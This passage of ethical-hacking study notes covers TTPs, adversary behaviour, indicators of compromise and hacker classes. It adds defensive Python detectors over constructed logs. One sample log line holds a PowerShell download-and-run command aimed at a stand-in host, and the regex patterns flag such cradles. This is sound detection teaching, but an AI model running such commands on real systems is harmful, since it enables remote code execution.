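    ("2024-01-05T08:11:00Z", "ws-0142", "beacon_to_known_c2"),
    ("2024-01-05T09:00:00Z", "ws-0142", "bulk_outbound_transfer"),
    ("2024-01-05T07:30:00Z", "ws-0077", "phishing_email_blocked"),
    ("2024-01-05T07:31:00Z", "gw-edge", "external_port_scan"),
    ("2024-01-05T07:32:00Z", "gw-edge", "not_a_known_alert"),
]

if __name__ == "__main__":
    for host, deepest, missed in triage(SAMPLE_ALERTS):
        print(f"{host}: reached '{deepest}'; no evidence for {missed or 'nothing'}")
```

The list of missed phases is the useful output for a defender: on the sample data the workstation that reached Actions on Objectives shows no Exploitation evidence at all, which points at a detection gap rather than at the adversary.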
Tactics, Techniques, and Procedures (TTPs)
The terms "tactics, techniques, and procedures" refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors. TTPs are helpful in analyzing threats and profiling threat actors and can further be used to strengthen the security infrastructure of an organization. The word "tactics" is defined as a guideline that describes the way an attacker performs their attack from beginning to end. The word "techniques" is defined as the technical methods used by an attacker to achieve intermediate results during their attack. Finally, the word "procedures" is defined as the organizational approach followed by the threat actors to launch their attack. In order to understand and defend against the threat actors, it is important to understand the TTPs used by adversaries. Understanding the tactics of an attacker helps to predict and detect evolving threats in the early stages. Understanding the techniques used by attackers helps to identify vulnerabilities and implement defensive measures in advance. Lastly, analyzing the procedures used by the attackers helps to identify what the attacker is looking for within the target organization's infrastructure. Organizations should understand TTPs to protect their network against threat actors and upcoming attacks. TTPs enable the organizations to stop attacks at the initial stage, thereby protecting the network against massive damages.
Tactics

Tactics describe the way the threat actor operates during different phases of an attack. It consists of the various tactics used to gather information for the initial exploitation, perform privilege escalation and lateral movement, and deploy measures for persistent access to the system. Generally, APT groups depend on a certain set of unchanging tactics, but in some cases, they adapt to different circumstances and alter the way they perform their attacks. Therefore, the difficulty of detecting and attributing the attack campaign depends on the tactics used to perform the attack.

An organization can profile threat actors based on the tactics they use; this consists of the way they gather information about a target, the methods they follow for initial compromise, and the number of entry points they use while attempting to enter the target network. For example, to obtain information, some threat actors depend solely on information available on the Internet, whereas others might perform social engineering or use connections in intermediate organizations. Once information such as the email addresses of employees of the target organization is gathered, the threat actors either choose to approach the target one by one or as a group. Furthermore, the attackers' payload can stay constant from the beginning to the end of the attack or may be changed based on the targeted individual. Therefore, to understand the threat actors better, the tactics used in the early stages of an attack must be analyzed properly.

Another method of analyzing the APT groups is inspecting the infrastructure and tools used to perform their attack. For example, consider establishing a command and control channel on the servers controlled by the attacker. These C&C servers may be located within a specific geographical location or may spread across the Internet and can be static or can change dynamically. It is also important to analyze the tools used to perform the attack. This includes analyzing the exploits and tools used by various APT groups. In such a scenario, a sophisticated threat actor may exploit many zero-day vulnerabilities by using adapted tools and obfuscation methods. However, this might be difficult as less-sophisticated threat actors generally depend on publicly known vulnerabilities and open-source tools. Identifying this type of tactic helps in profiling the APT groups and building defensive measures in advance.

In some cases, understanding the tactics used in the last stages of an attack helps in profiling the threat actor. Also, the methods used to cover the tracks help the target organization understand attack campaigns. Analyzing the tactics used by the attackers helps in creating an initial profile by understanding the different phases of an APT life cycle. This profile helps in performing further analysis of the techniques and procedures used by the attackers. An attacker may continually change the TTPs used, so it is important to constantly review and update the tactics used by the APT groups.
Techniques

To launch an attack successfully, threat actors use several techniques during its execution. These techniques include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration. The techniques followed by the threat actor to conduct an attack might vary, but they are mostly similar and can be used for profiling. Therefore, understanding the techniques used in the different phases of an attack is essential to analyzing the threat groups effectively.

Techniques can also be analyzed at each stage of the threat life cycle. Therefore, the techniques at the initial stage mainly describe the tools used for information gathering and initial exploitation. The techniques used in this stage need not necessarily have a technical aspect. For example, in social engineering, certain non-technical software tools are used as an effective way of gathering information. An attacker can use such tools to obtain the email addresses of employees of the target organization through publicly available resources.

In the same manner, purely human-based social engineering can be used to perform the initial exploitation. For example, consider a scenario where the victim is tricked via a phone call to reveal their login credentials for accessing the target organization's internal network. These techniques are used in the initial phase of an attack to gather information about the target and break the first line of defense.

Techniques used in the middle stages of an attack mostly depend on technical tools for escalating privileges on initially compromised systems or performing lateral movements within the target organization's network. At this stage of an attack, the attackers use various exploits or misuse configuration vulnerabilities on the target system. They may also exploit network design flaws to gain access to other systems in the network. In all of these cases, either exploits or a collection of tools allows the attacker to perform a successful attack. In this scenario, the term "technique" is the set of tools and the way they are used to obtain intermediate results during an attack campaign.

The techniques in the last stage of an attack can have both technical and nontechnical aspects. In such a scenario, the techniques used for data-stealing are usually based on network technology and encryption. For example, the threat actor encrypts the stolen files, transfers them through the established command and control channel, and copies them to their own system. After successfully executing the attack and transferring the files, the attacker follows certain purely technical techniques to cover their tracks. They use automated software tools to clear logs to evade detection.

After aggregating the techniques used in all the stages of an attack, the organization can use the information to profile the threat actors. In order to make an accurate attribution of threat actors, the organization must observe all the techniques used by its adversaries.
Procedures

"Procedures" involve a sequence of actions performed by the threat actors to execute different steps of an attack life cycle. The number of actions usually differs depending upon the objectives of the procedure and the APT group. An advanced threat actor uses advanced procedures that consist of more actions than a normal procedure to achieve the same intermediate result. This is done mainly to increase the success rate of an attack and decrease the probability of detection by security mechanisms.

For example, in a basic procedure of information gathering, an actor collects information about the target organization; identifies key targets and employees; collects their contact details; identifies vulnerable systems and potential entry points to the target network; and documents all the collected information. The further actions of an adversary depend on the tactics used. These actions include extensive research and repeated information gathering to collect in-depth and up-to-date information on the target individuals via social networking sites. This information can assist threat actors in performing spear phishing, monitoring security controls to identify zero-day exploits in the target systems, and other tasks. For example, a threat actor using a more detailed procedure executes the malware payload. At the time of execution, the malicious code decrypts itself, evades security monitoring controls, deploys persistence, and establishes a command and control channel for communicating with the victim system. This type of procedure is common for malware, where different threat actors may implement the same feature, and hence it is useful in forensic investigations.

An understanding and proper analysis of the procedures followed by certain threat actors during an attack helps organizations profile threat actors. In the initial stage of an attack, such as during information gathering, observing the procedure of an APT group is difficult. However, the later stages of an attack can leave trails that may be used to understand the procedures the attacker followed.
Adversary Behavioral Identification

Adversary behavioral identification involves the identification of the common methods or techniques followed by an adversary to launch attacks to penetrate an organization's network. It gives security professionals insight into upcoming threats and exploits. It helps them plan network security infrastructure and adapt a range of security procedures as prevention against various cyber attacks.

Given below are some of the behaviors of an adversary that can be used to enhance the detection capabilities of security devices:
Internal Reconnaissance

Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance. This includes the enumeration of systems, hosts, and processes, and the execution of various commands to find out information such as the local user context and system configuration, hostname, IP addresses, active remote systems, and programs running on the target systems. Security professionals can monitor the activities of an adversary by checking for unusual commands executed in Batch scripts and PowerShell and by using packet capturing tools.

Use of PowerShell

PowerShell can be used by an adversary as a tool for automating data exfiltration and launching further attacks. To identify the misuse of PowerShell in the network, security professionals can check PowerShell's transcript logs or Windows Event logs. The user agent string and IP addresses can also be used to identify malicious hosts who try to exfiltrate data.
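What "checking for unusual commands" looks like in practice, as an added example that is not part of the EC-Council courseware: the code below parses constructed process-creation records (a hypothetical key=value export from Windows event logs or an EDR agent), flags a burst of distinct discovery commands from one host inside a short window, and inspects PowerShell command lines for evasion switches and download-and-run patterns, decoding any -EncodedCommand argument so the analyst can read it. The host names, users, command lines, tool list, regular expressions and thresholds are all assumptions made for the example.

```python
"""Spot internal reconnaissance and PowerShell misuse in process logs.

Added example, not EC-Council's code; all records below are constructed.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery tools commonly run right after a foothold (local user context,
# host configuration, network neighbours). Matched on the image basename.
RECON_IMAGES = {"whoami.exe", "hostname.exe", "ipconfig.exe", "net.exe",
                "net1.exe", "nltest.exe", "systeminfo.exe", "tasklist.exe",
                "arp.exe", "netstat.exe", "quser.exe"}

# PowerShell switches and cmdlets that rarely appear together in legitimate
# administration: hidden window, no profile, bypassed policy, remote download.
PS_SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|downloadstring|invoke-expression|\biex\b)",
    re.IGNORECASE)
PS_ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_record(line):
    """Parse one 'ts=... host=... image=... cmdline="..."' record into a dict."""
    rec = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
           for m in KV.finditer(line)}
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec

def basename(image):
    return image.lower().rsplit("\\", 1)[-1]

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell base64-encodes the UTF-16LE form of the script.
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def powershell_findings(records):
    """Flag PowerShell invocations that are encoded or use evasion switches."""
    findings = []
    for r in records:
        if basename(r["image"]) != "powershell.exe":
            continue
        reasons = sorted({m.group(0).lower()
                          for m in PS_SUSPICIOUS.finditer(r["cmdline"])})
        decoded = decode_encoded_command(r["cmdline"])
        if decoded is not None:
            reasons.append("encoded command: " + decoded.strip())
        if reasons:
            findings.append((r["host"], r["pid"], reasons))
    return findings

def recon_bursts(records, window=timedelta(minutes=5), threshold=4):
    """Hosts that ran at least `threshold` distinct recon tools within `window`."""
    by_host = defaultdict(list)
    for r in records:
        image = basename(r["image"])
        if image in RECON_IMAGES:
            by_host[r["host"]].append((r["ts"], image))
    flagged = {}
    for host, events in by_host.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            in_window = {img for t, img in events[i:] if t - start <= window}
            if len(in_window) >= threshold:
                flagged[host] = sorted(in_window)
                break
    return flagged

# Constructed sample log. The encoded payload is a harmless cmdlet, built here
# so the decoder can be checked against a known plaintext.
ENCODED_DEMO = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
SYS32 = "C:\\Windows\\System32\\"
PS_EXE = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    f'ts=2024-01-05T08:12:01Z host=ws-0142 user=jdoe pid=4120 image={SYS32}whoami.exe cmdline="whoami /all"',
    f'ts=2024-01-05T08:12:05Z host=ws-0142 user=jdoe pid=4124 image={SYS32}hostname.exe cmdline="hostname"',
    f'ts=2024-01-05T08:12:20Z host=ws-0142 user=jdoe pid=4131 image={SYS32}ipconfig.exe cmdline="ipconfig /all"',
    f'ts=2024-01-05T08:13:02Z host=ws-0142 user=jdoe pid=4140 image={SYS32}net.exe cmdline="net view /domain"',
    f'ts=2024-01-05T08:14:10Z host=ws-0142 user=jdoe pid=4155 image={SYS32}nltest.exe cmdline="nltest /dclist:"',
    f'ts=2024-01-05T08:14:50Z host=ws-0077 user=asmith pid=2210 image={SYS32}ipconfig.exe cmdline="ipconfig"',
    f'ts=2024-01-05T08:15:00Z host=ws-0142 user=jdoe pid=4200 image={PS_EXE} cmdline="powershell.exe -nop -w hidden -enc {ENCODED_DEMO}"',
    f'ts=2024-01-05T08:16:00Z host=ws-0200 user=backup pid=5001 image={PS_EXE} cmdline="powershell.exe -File C:\\scripts\\backup.ps1"',
    f'ts=2024-01-05T08:17:30Z host=ws-0142 user=jdoe pid=4300 image={PS_EXE} cmdline="powershell.exe IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x.ps1\')"',
]

if __name__ == "__main__":
    recs = [parse_record(line) for line in SAMPLE_LOG]
    print("recon bursts:", recon_bursts(recs))
    for host, pid, reasons in powershell_findings(recs):
        print(f"{host} pid {pid}: {'; '.join(reasons)}")
```

The two checks are deliberately separate: a single ipconfig run is normal administration, so the burst detector only reacts to several different discovery tools in quick succession, while the PowerShell check reports each suspicious invocation on its own because one hidden, encoded command is already worth a look.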
Unspecified Proxy Activities

An adversary can create and configure multiple domains pointing to the same host, thus allowing an adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Using this data feed, the security professionals can also find any malicious files downloaded and the unsolicited communication with the outside network based on the domains.

Use of Command-Line Interface

On gaining access to the target system, an adversary can make use of the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Security professionals can identify this behavior of an adversary by checking the logs for process ID, processes having arbitrary letters and numbers, and malicious files downloaded from the Internet.

HTTP User Agent

[...] the network by analyzing server access, error logs, strings that indicate suspicious encoding, user agent strings, and through other methods.
Data Staging

After successful penetration into a target's network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, the business tactics of an organization, financial information, and network infrastructure information. Once collected, the adversary can either exfiltrate or destroy the data. Security professionals can detect data staging by monitoring network traffic for malicious file transfers, file integrity monitoring, and event logs.
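The proxy-domain, user-agent and data-staging behaviors above all leave traces in one place, the web proxy log, so a single added example covers the three (this is example code written for this edition, not EC-Council's). It runs over a constructed CSV export of proxy records: several domains resolving to the same external host (the "unspecified proxy" pattern), user agent strings that are either base64-like blobs or from no known client, and a host whose outbound byte volume to one destination dwarfs what it receives, which is what staged data leaving the network looks like. The column names, the list of known client prefixes, the RFC 1918 check and every threshold are assumptions.

```python
"""Proxy-domain fan-in, odd user agents and bulk outbound transfers.

Added example, not from the EC-Council courseware; the log is constructed.
"""
import csv
import io
import re
from collections import defaultdict

# Constructed proxy export: ts,src_host,domain,dest_ip,user_agent,bytes_out,bytes_in
SAMPLE_PROXY_LOG = """ts,src_host,domain,dest_ip,user_agent,bytes_out,bytes_in
2024-01-05T09:00:01Z,ws-0142,cdn-sync01.example,203.0.113.9,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,1200,80000
2024-01-05T09:05:11Z,ws-0142,update-node.example,203.0.113.9,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,900,45000
2024-01-05T09:10:40Z,ws-0142,metrics-relay.example,203.0.113.9,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,1100,200
2024-01-05T09:12:03Z,ws-0142,cdn-sync01.example,203.0.113.9,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,41000000,1500
2024-01-05T09:15:00Z,ws-0077,intranet.corp.example,10.0.0.20,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,3000,250000
2024-01-05T09:16:00Z,ws-0077,vendor-portal.example,198.51.100.7,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,2000,90000
2024-01-05T09:18:30Z,ws-0203,metrics-relay.example,203.0.113.9,RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==,600,600
2024-01-05T09:20:00Z,ws-0203,vendor-portal.example,198.51.100.7,curl/8.4.0,1500,70000
"""

# Assumed allow-list of client prefixes seen in this (hypothetical) estate.
KNOWN_UA_PREFIXES = ("Mozilla/", "Microsoft-CryptoAPI/", "Windows-Update-Agent/")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def load_records(text):
    """Parse the CSV export; byte counters become ints."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["bytes_out"] = int(r["bytes_out"])
        r["bytes_in"] = int(r["bytes_in"])
    return rows

def is_internal(ip):
    """RFC 1918 check; everything else is treated as external here."""
    a, b = (int(x) for x in ip.split(".")[:2])
    return a == 10 or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)

def domain_fan_in(records, min_domains=3):
    """External IPs reached under at least `min_domains` different names."""
    by_ip = defaultdict(set)
    for r in records:
        if not is_internal(r["dest_ip"]):
            by_ip[r["dest_ip"]].add(r["domain"])
    return {ip: sorted(d) for ip, d in by_ip.items() if len(d) >= min_domains}

def suspicious_user_agents(records):
    """User agents that look like encoded data or come from no known client."""
    out = []
    for r in records:
        ua = r["user_agent"]
        if B64_BLOB.match(ua):
            out.append((r["src_host"], ua, "base64-like user agent"))
        elif not ua.startswith(KNOWN_UA_PREFIXES):
            out.append((r["src_host"], ua, "unknown client"))
    return out

def bulk_outbound(records, min_bytes=10_000_000, ratio=5.0):
    """(host, dest_ip, bytes_out) for flows sending >= min_bytes with an
    outbound/inbound ratio of at least `ratio`; normal browsing is the reverse."""
    totals = defaultdict(lambda: [0, 0])
    for r in records:
        t = totals[(r["src_host"], r["dest_ip"])]
        t[0] += r["bytes_out"]
        t[1] += r["bytes_in"]
    flagged = [(host, ip, o) for (host, ip), (o, i) in totals.items()
               if o >= min_bytes and o >= ratio * max(i, 1)]
    return sorted(flagged)

if __name__ == "__main__":
    recs = load_records(SAMPLE_PROXY_LOG)
    print("fan-in:", domain_fan_in(recs))
    print("user agents:", suspicious_user_agents(recs))
    print("bulk outbound:", bulk_outbound(recs))
```

Fan-in is counted per destination address rather than per domain because the domains are cheap to replace; the address they all point at is what the adversary reuses. The outbound check keys on the ratio as well as the absolute volume so that a large legitimate download is not reported.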
Indicators of Compromise (IoCs)
Cyber threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of IoCs to effectively and efficiently detect and respond to evolving cyber threats.

Indicators of Compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization's infrastructure.

However, IoCs are not intelligence; rather, IoCs act as a good source of information about threats that serve as data points in the intelligence process. Actionable threat intelligence extracted from IoCs helps organizations enhance incident-handling strategies. Cybersecurity professionals use various automated tools to monitor IoCs to detect and prevent various security breaches to the organization. Monitoring IoCs also helps security teams enhance the security controls and policies of the organization to detect and block suspicious traffic to thwart further attacks. To overcome the threats associated with IoCs, some organizations like STIX and TAXII have developed standardized reports that contain condensed data related to attacks and shared it with others to leverage the incident response.

An IoC is an atomic indicator, computed indicator, or behavioral indicator. It is the information regarding suspicious or malicious activities that is collected from various security establishments in a network's infrastructure. Atomic indicators are those that cannot be segmented into smaller parts, and whose meaning is not changed in the context of an intrusion. Examples of atomic indicators are IP addresses and email addresses. Computed indicators are obtained from the data extracted from a security incident. Examples of computed indicators are hash values and regular expressions. Behavioral indicators refer to a grouping of both atomic and computed indicators, combined on the basis of some logic.
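The three indicator types differ in how they are matched, which an added example makes concrete (example code written for this edition, not EC-Council's): atomic indicators are compared as exact values (an IP address, a sender address), computed indicators are derived from evidence (a SHA-256 over file content, a regular expression over a command line), and a behavioral indicator is the two combined by a rule, here "a host that received mail from the indicator sender and later ran an encoded PowerShell command". The indicator values, the events and their field names are constructed.

```python
"""Match atomic, computed and behavioral IoCs against security events.

Added example, not part of the EC-Council text; all values are constructed.
"""
import hashlib
import re

# Atomic indicators: exact values that mean something on their own.
ATOMIC = {
    "ip": {"203.0.113.45"},
    "email": {"invoice@mail-relay.example"},
}
# Computed indicators: derived from incident data (hash of a sample, a pattern).
COMPUTED = {
    "sha256": {hashlib.sha256(b"constructed sample dropper").hexdigest()},
    "cmdline_regex": [re.compile(r"powershell(\.exe)?\s+.*-enc", re.IGNORECASE)],
}

def match_atomic(event):
    """Exact comparisons against the atomic sets."""
    hits = []
    for field in ("src_ip", "dst_ip"):
        if event.get(field) in ATOMIC["ip"]:
            hits.append(("atomic", "ip", event[field]))
    if event.get("sender") in ATOMIC["email"]:
        hits.append(("atomic", "email", event["sender"]))
    return hits

def match_computed(event):
    """Hash the evidence and run the patterns; nothing is compared verbatim."""
    hits = []
    content = event.get("file_content")
    if content is not None:
        digest = hashlib.sha256(content).hexdigest()
        if digest in COMPUTED["sha256"]:
            hits.append(("computed", "sha256", digest))
    cmd = event.get("cmdline", "")
    for rx in COMPUTED["cmdline_regex"]:
        if rx.search(cmd):
            hits.append(("computed", "cmdline_regex", rx.pattern))
    return hits

def match_events(events):
    """Return {event_id: [hits]} for every event with at least one match."""
    results = {}
    for ev in events:
        hits = match_atomic(ev) + match_computed(ev)
        if hits:
            results[ev["id"]] = hits
    return results

def behavioral_indicator(events):
    """Hosts where mail from the indicator sender was followed, later in time,
    by an encoded PowerShell command. Either hit alone is weak; ordered
    together they are the behavioral IoC."""
    first_mail = {}
    for ev in events:
        if ev.get("sender") in ATOMIC["email"]:
            host = ev["host"]
            first_mail[host] = min(ev["ts"], first_mail.get(host, ev["ts"]))
    hosts = set()
    for ev in events:
        host = ev["host"]
        if host in first_mail and ev["ts"] > first_mail[host] and \
                any(kind == "cmdline_regex" for _, kind, _ in match_computed(ev)):
            hosts.add(host)
    return sorted(hosts)

# Constructed events; ISO-8601 timestamps so string order equals time order.
SAMPLE_EVENTS = [
    {"id": 1, "ts": "2024-01-05T08:00:00Z", "host": "ws-0142", "sender": "invoice@mail-relay.example"},
    {"id": 2, "ts": "2024-01-05T08:03:00Z", "host": "ws-0142", "file_content": b"constructed sample dropper"},
    {"id": 3, "ts": "2024-01-05T08:04:00Z", "host": "ws-0142", "cmdline": "powershell.exe -nop -w hidden -enc QQBB"},
    {"id": 4, "ts": "2024-01-05T08:05:00Z", "host": "ws-0142", "src_ip": "10.0.5.12", "dst_ip": "203.0.113.45"},
    {"id": 5, "ts": "2024-01-05T08:10:00Z", "host": "ws-0077", "cmdline": "powershell.exe -File backup.ps1"},
    {"id": 6, "ts": "2024-01-05T07:50:00Z", "host": "ws-0203", "cmdline": "powershell.exe -enc QQBB"},
    {"id": 7, "ts": "2024-01-05T07:55:00Z", "host": "ws-0203", "sender": "invoice@mail-relay.example"},
]

if __name__ == "__main__":
    for event_id, hits in match_events(SAMPLE_EVENTS).items():
        print(event_id, hits)
    print("behavioral:", behavioral_indicator(SAMPLE_EVENTS))
```

Note that host ws-0203 has both component hits but in the wrong order (the PowerShell command ran before the mail arrived), so the behavioral rule does not fire for it; that ordering is the "logic" the passage refers to when it says the components are combined.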
Categories of Indicators of Compromise

The cybersecurity professionals must have proper knowledge about various possible threat actors and their tactics related to cyber threats, mostly called Indicators of Compromise (IoCs). This understanding of IoCs helps security professionals quickly detect the threats entering the organization and protect the organization from evolving threats. For this purpose, IoCs are divided into four categories:
Email Indicators

Attackers usually prefer email services to send malicious data to the target organization or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender's email address, email subject, and attachments or links.

Network Indicators

Network indicators are useful for command and control, malware delivery, and identifying details about the operating system, browser type, and other computer-specific information. Examples of network indicators include URLs, domain names, and IP addresses.

Host-Based Indicators

Host-based indicators are found by performing an analysis of the infected system within the organizational network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutex.
Behavioral Indicators

Generally, typical IoCs are useful for identifying indications of intrusion, such as malicious IP addresses, MD5 hash, virus signatures, and domain names. Behavioral IoCs are used to identify specific behavior related to malicious activities such as code injection into the memory or running the scripts of an application. Well-defined behaviors enable broad protection to block all current and future malicious activities. These indicators are useful to identify when legitimate system services are used for abnormal or unexpected activities. Examples of behavioral indicators include a document executing a PowerShell script, and remote command execution.

Listed below are some of the key Indicators of Compromise (IoCs):
- Unusual outbound network traffic
- Unusual activity through a privileged user account
- Geographical anomalies
- Multiple login failures
- Increased database read volume
- Large HTML response size
- Bundles of data in the wrong places
- Web traffic with superhuman behavior
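Three items from the list above turned into checks, as an added example (written for this edition, not EC-Council's code): multiple login failures (a burst of failures on one account, and whether a success followed it), geographical anomalies (one account authenticating from two countries faster than travel allows) and large HTML response size (a page returned at many times its own typical size, as when data is pulled out through a web application). The authentication and web log records, the GeoIP table and all thresholds are constructed assumptions.

```python
"""Three of the key IoCs listed above, checked over constructed logs.

Added example, not EC-Council's code; records, GeoIP data and thresholds
are all made up for the demonstration.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

def ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

# Constructed authentication log: (time, account, source IP, result).
AUTH_LOG = [
    ("2024-01-05T02:00:05Z", "svc-backup", "198.51.100.20", "fail"),
    ("2024-01-05T02:00:09Z", "svc-backup", "198.51.100.20", "fail"),
    ("2024-01-05T02:00:14Z", "svc-backup", "198.51.100.20", "fail"),
    ("2024-01-05T02:00:19Z", "svc-backup", "198.51.100.20", "fail"),
    ("2024-01-05T02:00:23Z", "svc-backup", "198.51.100.20", "fail"),
    ("2024-01-05T02:00:30Z", "svc-backup", "198.51.100.20", "success"),
    ("2024-01-05T08:15:00Z", "jdoe", "203.0.113.77", "success"),
    ("2024-01-05T08:40:00Z", "jdoe", "192.0.2.33", "success"),
    ("2024-01-05T09:00:00Z", "asmith", "203.0.113.78", "fail"),
    ("2024-01-05T09:00:40Z", "asmith", "203.0.113.78", "success"),
]
# Constructed GeoIP lookup; a real deployment queries a GeoIP database.
GEO = {"198.51.100.20": "DE", "203.0.113.77": "US", "192.0.2.33": "BR", "203.0.113.78": "US"}
# Constructed web server log: (request path, response bytes).
WEB_LOG = [
    ("/reports/export", 48000), ("/reports/export", 51000), ("/reports/export", 47000),
    ("/reports/export", 2400000),
    ("/login", 3100), ("/login", 3050), ("/login", 3120),
]

def login_failure_bursts(log, threshold=5, window=timedelta(minutes=2)):
    """Accounts with >= threshold failures inside one window.
    Returns {account: {"failures": n, "success_after": bool}}; a success right
    after the burst is the urgent case, because the guessing may have worked."""
    by_user = defaultdict(list)
    for t, user, _ip, result in log:
        by_user[user].append((ts(t), result))
    flagged = {}
    for user, events in by_user.items():
        events.sort()
        fails = [t for t, r in events if r == "fail"]
        for i in range(len(fails) - threshold + 1):
            if fails[i + threshold - 1] - fails[i] <= window:
                end = fails[i] + window
                n = sum(1 for f in fails if fails[i] <= f <= end)
                after = any(r == "success" and t > fails[i + threshold - 1] for t, r in events)
                flagged[user] = {"failures": n, "success_after": after}
                break
    return flagged

def impossible_travel(log, min_gap=timedelta(hours=2)):
    """Consecutive successful logins for one account from different countries
    closer together than `min_gap`. Returns (account, from, to, minutes)."""
    last = {}
    flagged = []
    for t, user, ip, result in sorted(log):
        if result != "success":
            continue
        now, country = ts(t), GEO.get(ip, "??")
        if user in last:
            prev_t, prev_c = last[user]
            if prev_c != country and now - prev_t < min_gap:
                flagged.append((user, prev_c, country, int((now - prev_t).total_seconds() // 60)))
        last[user] = (now, country)
    return flagged

def large_responses(log, factor=10):
    """Responses larger than `factor` times the median size for their path.
    The median is used so the outlier itself does not drag the baseline up."""
    sizes = defaultdict(list)
    for path, size in log:
        sizes[path].append(size)
    return [(path, size) for path, size in log
            if len(sizes[path]) >= 3 and size > factor * statistics.median(sizes[path])]

if __name__ == "__main__":
    print("login bursts:", login_failure_bursts(AUTH_LOG))
    print("impossible travel:", impossible_travel(AUTH_LOG))
    print("large responses:", large_responses(WEB_LOG))
```

Each check is scoped to one account or one path rather than to the whole log, because the listed IoCs are deviations from that entity's own normal: five failures on one account in twenty seconds is an indicator, five failures spread across a company in a day is not.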
Hacking Concepts

This section deals with basic concepts of hacking: what is hacking, who is a hacker, and hacker classes, and the five distinct hacking phases that one should be familiar with before proceeding with the ethical hacking methodology.
What is Hacking?

Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves modifying system or application features to achieve a goal outside its creator's original purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, thus leading to business loss.

Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motive behind hacking could be to steal critical information or services, for thrill, intellectual challenge, curiosity, knowledge, experiment, financial gain, prestige, power, peer recognition, vengeance and vindictiveness, among other reasons.
Who is a Hacker?

A hacker is a person who breaks into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. A hacker is an intelligent individual with excellent computer skills, along with the ability to create and explore the computer's software and hardware. Usually, a hacker is a skilled engineer or programmer with enough knowledge to discover vulnerabilities in a target system. They generally have subject expertise and enjoy learning the details of various programming languages and computer systems. For some hackers, hacking is a hobby to see how many computers or networks they can compromise. Their intention can either be to gain knowledge or to poke around to do illegal things. Some hack with malicious intent behind their escapades, like stealing business data, credit card information, social security numbers, and email passwords.
Hacker Classes

Hackers usually fall into one of the following categories, according to their activities:
- Black Hats: Black hats are individuals who use their extraordinary computing skills for illegal or malicious purposes. This category of hacker is often involved in criminal activities. They are also known as crackers.
- White Hats: White hats or penetration testers are individuals who use their hacking skills for defensive purposes. These days, almost every organization has security analysts who are knowledgeable about hacking countermeasures, which can secure its network and information systems against malicious attacks. They have permission from the system owner.
- Gray Hats: Gray hats are the individuals who work both offensively and defensively at various times. Gray hats might help hackers find various vulnerabilities in a system or network and, at the same time, help vendors to improve products (software or hardware) by checking limitations and making them more secure.
- Cyber Terrorists: Cyber terrorists are individuals with a wide range of skills, motivated by religious or political beliefs, to create fear of large-scale disruption of computer networks.
- State-Sponsored Hackers: State-sponsored hackers are individuals employed by the government to penetrate, gain top-secret information from, and damage the information systems of other governments.
- Hacktivist: Hacktivism is when hackers break into government or corporate computer systems as an act of protest. Hacktivists use hacking to increase awareness of their social or political agendas, as well as to boost their own reputations in both the online and offline arenas. They are individuals who use hacking to promote a political agenda, especially by defacing or disabling websites. Common hacktivist targets include government agencies, multinational corporations, and any other entity that they perceive as a threat. Irrespective of the hacktivists' intentions, the gaining of unauthorized access is a crime.
Slide: Hacking Phase: Reconnaissance. Reconnaissance refers to the preparatory phase in which an attacker gathers information about a target prior to launching an attack; the target range may include the target organization's clients, employees, operations, network, and systems. Reconnaissance types: passive reconnaissance (acquiring information without directly interacting with the target, for example, searching public records or news releases) and active reconnaissance (interacting with the target directly by any means, for example, telephone calls to the help desk or technical department).
Hacking Phases

In general, there are five phases of hacking:
- Reconnaissance
- Scanning
- Gaining Access
- Maintaining Access
- Clearing Tracks

Hacking Phase: Reconnaissance

